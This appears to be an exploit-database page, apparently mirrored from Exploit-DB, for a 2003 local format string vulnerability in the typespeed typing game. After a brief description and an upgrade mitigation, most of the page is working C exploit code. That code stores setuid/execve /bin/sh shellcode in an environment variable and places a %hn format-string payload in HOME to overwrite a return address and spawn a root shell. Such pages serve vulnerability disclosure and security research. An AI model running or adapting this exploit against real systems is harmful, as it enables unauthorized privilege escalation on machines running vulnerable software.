header-logo
Suggest Exploit
vendor:
typespeed
by:
Javier Kohen
7.2
CVSS
HIGH
Format String Vulnerability
134
CWE
Product Name: typespeed
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2003

typespeed Local Format String Vulnerability

typespeed is prone to a local format string vulnerability. Successful exploitation could allow privilege escalation. The exploit uses a proof of concept local exploit for typespeed tool. It sets the environment variable HOME to a buffer containing the address of the variable var, which is then used to overwrite the return address of the main function with the address of the shellcode. The exploit then calls the typespeed tool, which executes the shellcode.

Mitigation:

Upgrade to the latest version of typespeed.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/12569/info

typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. 

/*

Proof of Concept local exploit for typespeed tool

"enva" content:

*********************************************
#include <stdio.h>
#include <string.h>
  int main(int argc, char *argv[])
  {
  char *addr_ptr = NULL;
  addr_ptr = getenv(argv[1]);
  printf("%s @ %p\n", argv[1], addr_ptr);
  return 0;
  }
*********************************************

*/

#include <stdio.h>
#define offset 2
#define var (0x08050288+0x4)

char shellcode[] = 
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\xcd\x80";

int main(int argc, char *argv[])
{
char *addr[3] = { ((char *)var +2),
		  ((char *)var),
		};

char buffer[1024];
int high, low;
long target;

target = 0xbffff950;

high = (target & 0xffff0000) >> 16;
low = (target & 0x0000ffff);

high -= 0x8;
sprintf(buffer, "%s%%.%dx%%%d$hn%%.%dx%%%d$hn", 
		&addr,
		high,
		offset,
		(low - high)-0x8,
		offset+1);
memset(buffer+strlen(buffer), 0x41, 32);

setenv("HOME", buffer, 1);
setenv("SHELLCODE", shellcode, 1);
system("./enva SHELLCODE");
system("./typespeed");
}

Navigation

Suggest Exploit

Services By CQR